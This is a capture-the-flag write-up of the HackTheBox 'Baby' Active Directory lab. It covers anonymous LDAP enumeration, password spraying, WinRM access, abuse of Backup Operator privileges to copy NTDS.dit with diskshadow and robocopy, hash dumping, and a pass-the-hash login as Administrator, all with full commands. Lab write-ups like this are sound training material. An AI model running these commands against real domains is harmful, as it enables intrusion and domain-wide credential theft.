HackTheBoxActiveDirectoryWindowsVulnLabs

Baby

Another easy AD machine on HTB (from VulnLabs)

1. Reconnaissance and Enumeration

We begin by scanning the target IP 10.129.234.71 with Nmap. The scan reveals a standard Active Directory Domain Controller configuration with DNS, Kerberos, RPC, SMB, LDAP, and WinRM open.

┌──(kali㉿kali)-[~]
└─$ nmap -p53,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389 10.129.234.71 -sCV
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-02 04:00 -0500
Nmap scan report for 10.129.234.71
Host is up (0.54s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-03-02 09:00:09Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: baby.vl, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: baby.vl, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-03-02T09:01:23+00:00; -3s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: BABY
|   NetBIOS_Domain_Name: BABY
|   NetBIOS_Computer_Name: BABYDC
|   DNS_Domain_Name: baby.vl
|   DNS_Computer_Name: BabyDC.baby.vl
|   DNS_Tree_Name: baby.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2026-03-02T09:00:44+00:00
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Not valid before: 2026-03-01T08:30:35
|_Not valid after:  2026-08-31T08:30:35
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: BABYDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -3s, deviation: 0s, median: -3s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2026-03-02T09:00:46
|_  start_date: N/A

Knowing LDAP is available, we perform an anonymous bind to dump the directory data. In the output, we uncover a hardcoded password within the description attribute of a user named Teresa Bell.

ldapsearch -x -H ldap://10.129.234.71 -b "dc=baby,dc=vl"
# extended LDIF
#
# LDAPv3
# base <dc=baby,dc=vl> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# baby.vl
dn: DC=baby,DC=vl

# Administrator, Users, baby.vl
dn: CN=Administrator,CN=Users,DC=baby,DC=vl
...SNIP...
# Teresa Bell, it, baby.vl
dn: CN=Teresa Bell,OU=it,DC=baby,DC=vl
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Teresa Bell
sn: Bell
description: Set initial password to BabyStart123!
givenName: Teresa
distinguishedName: CN=Teresa Bell,OU=it,DC=baby,DC=vl
instanceType: 4
whenCreated: 20211121151108.0Z
whenChanged: 20211121151437.0Z
displayName: Teresa Bell
uSNCreated: 12889
memberOf: CN=it,CN=Users,DC=baby,DC=vl
uSNChanged: 12905
name: Teresa Bell
objectGUID:: EDGXW4JjgEq7+GuyHBu3QQ==
userAccountControl: 66080
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
pwdLastSet: 132819812778759642
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAf1veU67Ze+7mkhtWWgQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: Teresa.Bell
sAMAccountType: 805306368
userPrincipalName: [email protected]
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=baby,DC=vl
dSCorePropagationData: 20211121163014.0Z
dSCorePropagationData: 20211121162927.0Z
dSCorePropagationData: 16010101000416.0Z
msDS-SupportedEncryptionTypes: 0

2. Initial Access

With a potential set of credentials (Teresa.Bell:BabyStart123!), we attempt to authenticate via SMB and WinRM, but the login fails.

┌──(kali㉿kali)-[~]
└─$ netexec smb 10.129.234.71 -u 'Teresa.Bell' -p 'BabyStart123!' -d baby.vl
SMB         10.129.234.71   445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.234.71   445    BABYDC           [-] baby.vl\Teresa.Bell:BabyStart123! STATUS_LOGON_FAILURE 
                                                                                                                                                                                                                                           
┌──(kali㉿kali)-[~]
└─$ netexec winrm 10.129.234.71 -u 'Teresa.Bell' -p 'BabyStart123!' -d baby.vl
WINRM       10.129.234.71   5985   BABYDC           [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl) 
WINRM       10.129.234.71   5985   BABYDC           [-] baby.vl\Teresa.Bell:BabyStart123!

Suspecting that this might be a default initial password used across the IT or Dev departments, we extract a list of users from our previous LDAP dump and spray the password across the domain using netexec.

┌──(kali㉿kali)-[~]
└─$ netexec smb 10.129.234.71 -u users.txt -p 'BabyStart123!' -d baby.vl --continue-on-success
SMB         10.129.234.71   445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.234.71   445    BABYDC           [-] baby.vl\Administrator:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.234.71   445    BABYDC           [-] baby.vl\Guest:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.234.71   445    BABYDC           [-] baby.vl\krbtgt:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.234.71   445    BABYDC           [-] baby.vl\Jacqueline.Barnett:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.234.71   445    BABYDC           [-] baby.vl\Ashley.Webb:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.234.71   445    BABYDC           [-] baby.vl\Hugh.George:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.234.71   445    BABYDC           [-] baby.vl\Leonard.Dyer:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.234.71   445    BABYDC           [-] baby.vl\Ian.Walker:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.234.71   445    BABYDC           [-] baby.vl\Connor.Wilkinson:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.234.71   445    BABYDC           [-] baby.vl\Joseph.Hughes:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.234.71   445    BABYDC           [-] baby.vl\Kerry.Wilson:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.234.71   445    BABYDC           [-] baby.vl\Teresa.Bell:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.234.71   445    BABYDC           [-] baby.vl\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE

For Caroline.Robinson it returned STATUS_PASSWORD_MUST_CHANGE. This confirms the password is valid but requires a reset upon first login. We use smbpasswd to update the password to Test123!.(It seems the password is default for every new user, but requires to change upon login)

┌──(kali㉿kali)-[~]
└─$ smbpasswd -r 10.129.234.71 -U Caroline.Robinson
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user Caroline.Robinson

We verify the newly set credentials (Test123!) with netexec over WinRM, confirming a successful connection and Pwn3d! status.

┌──(kali㉿kali)-[~]
└─$ netexec winrm 10.129.234.71 -u 'Caroline.Robinson' -p 'Test123!'                                               
WINRM       10.129.234.71   5985   BABYDC           [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl) 
WINRM       10.129.234.71   5985   BABYDC           [+] baby.vl\Caroline.Robinson:Test123! (Pwn3d!)

With remote access verified, we drop into a WinRM shell and secure the user flag.

┌──(kali㉿kali)-[~]
└─$ evil-winrm -i 10.129.234.71 -u Caroline.Robinson -p 'Test123!'
                                        
Evil-WinRM shell v3.9
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> cat user.txt
5dc37xxxxxxxxxxxxxxxx4bdb487445b

3. Privilege Escalation

To find a path to Domain Admin, we run the Python ingestor for BloodHound.

┌──(kali㉿kali)-[~/Documents/baby]
└─$ bloodhound-python -u 'Caroline.Robinson' -p 'Test123!' -d baby.vl -ns 10.129.234.71 -c All
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: baby.vl
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (babydc.baby.vl:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: babydc.baby.vl
INFO: Testing resolved hostname connectivity dead:beef::3efb:f88e:323a:4fb
INFO: Trying LDAP connection to dead:beef::3efb:f88e:323a:4fb
INFO: Testing resolved hostname connectivity dead:beef::16e
INFO: Trying LDAP connection to dead:beef::16e
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: babydc.baby.vl
INFO: Testing resolved hostname connectivity dead:beef::3efb:f88e:323a:4fb
INFO: Trying LDAP connection to dead:beef::3efb:f88e:323a:4fb
INFO: Testing resolved hostname connectivity dead:beef::16e
INFO: Trying LDAP connection to dead:beef::16e
INFO: Found 14 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: BabyDC.baby.vl
INFO: Done in 01M 25S

and in bloodhound it revealed that our user Caroline.Robinson is a part of BACKUP [email protected]. By default, members of the Backup Operators group are granted two extremely powerful Local Security Authority (LSA) user rights:

SeBackupPrivilege (Back up files and directories): This privilege allows the user to completely bypass NTFS file read permissions. If a file exists on the Domain Controller, a Backup Operator can read it and copy it, even if the file's ACL explicitly denies them access.
SeRestorePrivilege (Restore files and directories): This allows the user to bypass NTFS file write permissions. A Backup Operator can overwrite or modify any file on the system, including critical system binaries or configuration files.

So now the attack path for root flag is clear:

Leverage the SeBackupPrivilege to create a shadow copy or use API calls that trigger the "backup intent" flag.
Copy the NTDS.dit file and the SYSTEM registry hive to a temporary folder or export them over the network.
Take those files offline and use a tool like Impacket's secretsdump.py to decrypt the database and dump every NTLM hash in the domain.
Perform a Pass-the-Hash attack using the Domain Admin's hash to take full control.

We execute these steps using diskshadow natively via our WinRM session. We script the shadow copy creation to avoid interactive prompts.

*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> mkdir C:\temp -ErrorAction SilentlyContinue
 
"set context persistent nowriters" | Out-File C:\temp\shadow.txt -Encoding ascii
"set metadata C:\temp\meta.cab" | Out-File C:\temp\shadow.txt -Append -Encoding ascii
"add volume c: alias temp" | Out-File C:\temp\shadow.txt -Append -Encoding ascii
"create" | Out-File C:\temp\shadow.txt -Append -Encoding ascii
"expose %temp% Z:" | Out-File C:\temp\shadow.txt -Append -Encoding ascii
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> diskshadow /s C:\temp\shadow.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  BABYDC,  3/2/2026 10:07:49 AM

-> set context persistent nowriters
-> set metadata C:\temp\meta.cab
-> add volume c: alias temp
-> create
Alias temp for shadow ID {1d3dc8b4-e344-47da-b0ee-f833b5327240} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {4b31bef7-d953-40cf-b6e9-91c5a2fe6176} set as environment variable.

Querying all shadow copies with the shadow copy set ID {4b31bef7-d953-40cf-b6e9-91c5a2fe6176}

        * Shadow copy ID = {1d3dc8b4-e344-47da-b0ee-f833b5327240}               %temp%
                - Shadow copy set: {4b31bef7-d953-40cf-b6e9-91c5a2fe6176}       %VSS_SHADOW_SET%
                - Original count of shadow copies = 1
                - Original volume name: \\?\Volume{711fc68a-0000-0000-0000-100000000000}\ [C:\]
                - Creation time: 3/2/2026 10:07:51 AM
                - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
                - Originating machine: BabyDC.baby.vl
                - Service machine: BabyDC.baby.vl
                - Not exposed
                - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
                - Attributes:  No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1
-> expose %temp% Z:
-> %temp% = {1d3dc8b4-e344-47da-b0ee-f833b5327240}
The shadow copy was successfully exposed as Z:\.

With the shadow volume mounted as Z:\, we use robocopy with the /b flag (backup mode) to pull down the AD database and SYSTEM hive into our temp directory.

*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> robocopy /b Z:\Windows\NTDS C:\temp NTDS.dit

*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> robocopy /b Z:\Windows\System32\config C:\temp SYSTEM

then, download both NTDS.dit, and SYSTEM locally to our Kali machine.

*Evil-WinRM* PS C:\temp> download ntds.dit
                                        
Info: Downloading C:\temp\ntds.dit to ntds.dit
                                        
Info: Download successful!
*Evil-WinRM* PS C:\temp> download SYSTEM
                                        
Info: Downloading C:\temp\SYSTEM to SYSTEM
                                        
Info: Download successful!

4. Dumping Hashes & Root Access

Now that we have the target files locally, we use Impacket to decrypt the database. This allows us to retrieve the NTLM hashes for every account in the baby.vl domain.

Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0xxxxxxxxxxxxxxxxx
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: xxxxxxxxxxxxxxxxx
[*] Reading and decrypting hashes from ntds.dit 

Administrator:500:xxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxx:::
Guest:501:xxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxx:::
BABYDC$:1000:xxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxx:::
krbtgt:502:xxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxx:::
baby.vl\Jacqueline.Barnett:1104:xxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxx:::
baby.vl\Ashley.Webb:1105:xxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxx:::
baby.vl\Hugh.George:1106:xxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxx:::
baby.vl\Leonard.Dyer:1107:xxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxx:::
baby.vl\Ian.Walker:1108:xxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxx:::
baby.vl\Connor.Wilkinson:1110:xxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxx:::
baby.vl\Joseph.Hughes:1112:xxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxx:::
baby.vl\Kerry.Wilson:1113:xxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxx:::
baby.vl\Teresa.Bell:1114:xxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxx:::
baby.vl\Caroline.Robinson:1115:xxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxx:::

[*] Kerberos keys from ntds.dit 

Administrator:aes256-cts-hmac-sha1-96:xxxxxxxxxxxxxxxxx
Administrator:aes128-cts-hmac-sha1-96:xxxxxxxxxxxxxxxxx
Administrator:des-cbc-md5:xxxxxxxxxxxxxxxxx

BABYDC$:aes256-cts-hmac-sha1-96:xxxxxxxxxxxxxxxxx
BABYDC$:aes128-cts-hmac-sha1-96:xxxxxxxxxxxxxxxxx
BABYDC$:des-cbc-md5:xxxxxxxxxxxxxxxxx

krbtgt:aes256-cts-hmac-sha1-96:xxxxxxxxxxxxxxxxx
krbtgt:aes128-cts-hmac-sha1-96:xxxxxxxxxxxxxxxxx
krbtgt:des-cbc-md5:xxxxxxxxxxxxxxxxx

baby.vl\Jacqueline.Barnett:aes256-cts-hmac-sha1-96:xxxxxxxxxxxxxxxxx
baby.vl\Jacqueline.Barnett:aes128-cts-hmac-sha1-96:xxxxxxxxxxxxxxxxx
baby.vl\Jacqueline.Barnett:des-cbc-md5:xxxxxxxxxxxxxxxxx

baby.vl\Ashley.Webb:aes256-cts-hmac-sha1-96:xxxxxxxxxxxxxxxxx
baby.vl\Ashley.Webb:aes128-cts-hmac-sha1-96:xxxxxxxxxxxxxxxxx
baby.vl\Ashley.Webb:des-cbc-md5:xxxxxxxxxxxxxxxxx

baby.vl\Hugh.George:aes256-cts-hmac-sha1-96:xxxxxxxxxxxxxxxxx
baby.vl\Hugh.George:aes128-cts-hmac-sha1-96:xxxxxxxxxxxxxxxxx
baby.vl\Hugh.George:des-cbc-md5:xxxxxxxxxxxxxxxxx

baby.vl\Leonard.Dyer:aes256-cts-hmac-sha1-96:xxxxxxxxxxxxxxxxx
baby.vl\Leonard.Dyer:aes128-cts-hmac-sha1-96:xxxxxxxxxxxxxxxxx
baby.vl\Leonard.Dyer:des-cbc-md5:xxxxxxxxxxxxxxxxx

baby.vl\Ian.Walker:aes256-cts-hmac-sha1-96:xxxxxxxxxxxxxxxxx
baby.vl\Ian.Walker:aes128-cts-hmac-sha1-96:xxxxxxxxxxxxxxxxx
baby.vl\Ian.Walker:des-cbc-md5:xxxxxxxxxxxxxxxxx

baby.vl\Connor.Wilkinson:aes256-cts-hmac-sha1-96:xxxxxxxxxxxxxxxxx
baby.vl\Connor.Wilkinson:aes128-cts-hmac-sha1-96:xxxxxxxxxxxxxxxxx
baby.vl\Connor.Wilkinson:des-cbc-md5:xxxxxxxxxxxxxxxxx

baby.vl\Joseph.Hughes:aes256-cts-hmac-sha1-96:xxxxxxxxxxxxxxxxx
baby.vl\Joseph.Hughes:aes128-cts-hmac-sha1-96:xxxxxxxxxxxxxxxxx
baby.vl\Joseph.Hughes:des-cbc-md5:xxxxxxxxxxxxxxxxx

baby.vl\Kerry.Wilson:aes256-cts-hmac-sha1-96:xxxxxxxxxxxxxxxxx
baby.vl\Kerry.Wilson:aes128-cts-hmac-sha1-96:xxxxxxxxxxxxxxxxx
baby.vl\Kerry.Wilson:des-cbc-md5:xxxxxxxxxxxxxxxxx

baby.vl\Teresa.Bell:aes256-cts-hmac-sha1-96:xxxxxxxxxxxxxxxxx
baby.vl\Teresa.Bell:aes128-cts-hmac-sha1-96:xxxxxxxxxxxxxxxxx
baby.vl\Teresa.Bell:des-cbc-md5:xxxxxxxxxxxxxxxxx

baby.vl\Caroline.Robinson:aes256-cts-hmac-sha1-96:xxxxxxxxxxxxxxxxx
baby.vl\Caroline.Robinson:aes128-cts-hmac-sha1-96:xxxxxxxxxxxxxxxxx
baby.vl\Caroline.Robinson:des-cbc-md5:xxxxxxxxxxxxxxxxx

[*] Cleaning up...

With the NT hash for the built-in Administrator account successfully extracted, we use Evil-WinRM to execute a Pass-the-Hash (PtH) attack. This grants us a direct, elevated shell as the Domain Admin, allowing us to read the final root flag.

┌──(kali㉿kali)-[~]
└─$ evil-winrm -i 10.129.234.71 -u Administrator \
-H ee445xxxxxxxxxxxxxxxxd9cef123d
                                        
Evil-WinRM shell v3.9
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
62xxxxxxxxxxxxxxxxxa08288b1e

PreviousSupport NextResolute

Last updated 15 days ago

hashtag1. Reconnaissance and Enumeration

hashtag2. Initial Access

hashtag3. Privilege Escalation

hashtag4. Dumping Hashes & Root Access

1. Reconnaissance and Enumeration

2. Initial Access

3. Privilege Escalation

4. Dumping Hashes & Root Access